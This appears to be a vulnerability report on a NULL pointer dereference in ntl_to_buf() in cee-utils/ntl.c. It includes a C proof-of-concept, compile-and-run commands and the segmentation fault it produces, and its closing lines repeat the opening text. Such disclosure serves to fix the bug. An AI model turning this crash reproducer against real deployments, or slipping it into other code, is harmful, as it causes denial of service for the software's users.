The NULL Pointer vulnerability happens in ntl_to_buf(), cee-utils/ntl.c
How the vulnerabilitiy happens:
ntl_to_buf() is invoked with buf is NULL, the first element of p is NULL- The NULL variable
buf gets dereferenced at *buf = '\0';
Steps to reproduce:
- Compile following file (poc.c)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "ntl.h"
size_t serialize_element(char *buf, size_t size, void *element) {
if (!element) {
const char *null_str = "null";
if (buf) snprintf(buf, size, "%s", null_str);
return strlen(null_str);
}
int *val = (int*)element;
return snprintf(buf, size, "%d", *val);
}
int main(void) {
ntl_t p = ntl_calloc(3, sizeof(int));
struct ntl_str_delimiter delim = {
.start_delimiter = '[',
.element_delimiter = ", ",
.last_element_delimiter = "",
.end_delimiter = ']',
.null_ntl = "[]"
};
char *result = NULL;
ntl_to_abuf(&result, p, &delim, serialize_element);
}
- Compile and Run
$ gcc poc.c -o poc -L. -lreddit
$ ./poc
zsh: segmentation fault (core dumped) ./poc
The NULL Pointer vulnerability happens in
ntl_to_buf(),cee-utils/ntl.cHow the vulnerabilitiy happens:
ntl_to_buf()is invoked withbufisNULL, the first element ofpisNULLbufgets dereferenced at*buf = '\0';Steps to reproduce: